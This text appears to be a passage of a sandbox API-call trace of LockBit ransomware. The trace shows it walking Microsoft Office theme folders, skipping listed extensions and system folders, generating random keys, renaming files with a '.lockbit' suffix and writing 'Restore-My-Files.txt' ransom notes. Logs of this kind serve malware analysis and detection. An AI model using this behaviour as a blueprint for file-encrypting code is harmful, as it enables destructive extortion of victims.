lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.931] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Verve.xml") returned -1 [0193.932] lstrcmpiW (lpString1="ntldr", lpString2="Verve.xml") returned -1 [0193.932] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Verve.xml") returned -1 [0193.932] lstrcmpiW (lpString1="bootsect.bak", lpString2="Verve.xml") returned -1 [0193.932] lstrcmpiW (lpString1="autorun.inf", lpString2="Verve.xml") returned -1 [0193.932] lstrcmpiW (lpString1="thumbs.db", lpString2="Verve.xml") returned -1 [0193.932] lstrcmpiW (lpString1="iconcache.db", lpString2="Verve.xml") returned -1 [0193.932] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.932] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml") returned=".xml" [0193.932] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.932] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.932] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.933] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.934] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.934] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.934] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.934] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.lockbit") returned 84 [0193.934] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.939] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.939] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.939] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=960) returned 1 [0193.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.940] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.943] malloc (_Size=0xbe) returned 0x1fa2ed8 [0193.943] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0193.944] free (_Block=0x1fa2ed8) [0193.944] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.944] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.944] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.944] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b2600, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b2600, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.xml", cAlternateFileName="")) returned 1 [0193.944] lstrcmpiW (lpString1=".", lpString2="Waveform.xml") returned -1 [0193.944] lstrcmpiW (lpString1="..", lpString2="Waveform.xml") returned -1 [0193.944] PathFindExtensionW (pszPath="Waveform.xml") returned=".xml" [0193.944] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.944] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.944] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.944] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.944] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.944] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.945] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.946] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Waveform.xml") returned -1 [0193.947] lstrcmpiW (lpString1="ntldr", lpString2="Waveform.xml") returned -1 [0193.947] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Waveform.xml") returned -1 [0193.947] lstrcmpiW (lpString1="bootsect.bak", lpString2="Waveform.xml") returned -1 [0193.947] lstrcmpiW (lpString1="autorun.inf", lpString2="Waveform.xml") returned -1 [0193.947] lstrcmpiW (lpString1="thumbs.db", lpString2="Waveform.xml") returned -1 [0193.947] lstrcmpiW (lpString1="iconcache.db", lpString2="Waveform.xml") returned -1 [0193.947] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.947] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml") returned=".xml" [0193.947] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.947] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.947] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.948] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.948] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.lockbit") returned 87 [0193.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\waveform.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0193.949] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.949] malloc (_Size=0x40068) returned 0x3d70450 [0193.950] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=963) returned 1 [0193.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0193.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0193.951] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0193.957] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.957] malloc (_Size=0xc4) returned 0x1fa2ed8 [0193.957] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0193.958] free (_Block=0x1fa2ed8) [0193.958] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Waveform.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.958] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.958] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b2600, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b2600, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.xml", cAlternateFileName="")) returned 0 [0193.958] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0193.958] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5caf100, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0193.958] lstrcmpiW (lpString1=".", lpString2="Theme Effects") returned -1 [0193.958] lstrcmpiW (lpString1="..", lpString2="Theme Effects") returned -1 [0193.958] lstrcmpiW (lpString1="Theme Effects", lpString2="$windows.~bt") returned 1 [0193.958] lstrcmpiW (lpString1="Theme Effects", lpString2="intel") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="msocache") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="$recycle.bin") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="$windows.~ws") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="tor browser") returned -1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="boot") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="system volume information") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="perflogs") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="google") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="application data") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="windows") returned -1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="windows.old") returned -1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="appdata") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="Windows nt") returned -1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="Msbuild") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="Microsoft") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="All users") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="mozilla") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="Microsoft.NET") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="microsoft shared") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="Internet Explorer") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="common files") returned 1 [0193.959] lstrcmpiW (lpString1="Theme Effects", lpString2="opera") returned 1 [0193.960] lstrcmpiW (lpString1="Theme Effects", lpString2="Windows Journal") returned -1 [0193.960] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 67 [0193.960] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\*") returned 69 [0193.960] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0193.964] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0193.964] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5caf100, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.968] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0193.968] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0193.968] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c8a500, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe591d000, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x61c8a500, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x5261, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adjacency.eftx", cAlternateFileName="ADJACE~1.EFT")) returned 1 [0193.968] lstrcmpiW (lpString1=".", lpString2="Adjacency.eftx") returned -1 [0193.968] lstrcmpiW (lpString1="..", lpString2="Adjacency.eftx") returned -1 [0193.968] PathFindExtensionW (pszPath="Adjacency.eftx") returned=".eftx" [0193.968] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0193.968] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0193.968] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0193.969] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0193.969] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0193.969] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0193.969] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0193.969] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0193.969] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 